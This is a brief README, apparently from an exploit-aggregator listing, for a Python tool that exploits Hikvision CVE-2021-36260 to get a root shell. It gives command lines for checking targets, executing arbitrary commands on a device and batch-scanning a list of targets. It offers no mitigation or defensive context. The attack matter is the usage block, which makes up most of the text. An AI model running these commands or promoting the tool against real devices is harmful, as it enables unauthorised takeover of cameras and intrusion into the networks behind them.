## https://sploitus.com/exploit?id=2E549029-0E60-5F68-BB90-DF14FA88C6FE
# Hikvision CVE-2021-36260 RCE Vulnerability
## Vulnerability Description
An attacker can exploit this vulnerability to gain unlimited control over the device using a root shell. Even if the device owner is restricted by a limited protected shell (psh), it is still possible to access and attack the internal network. ## Usage
```
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
Optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Start scanning the specified URL
-f FILE, --file FILE Read the URL from the specified file
--check Check whether it is vulnerable
--cmd CMD Execute the specified command (e.g.: "ls -l")
```
Can be used for batch scanning of src files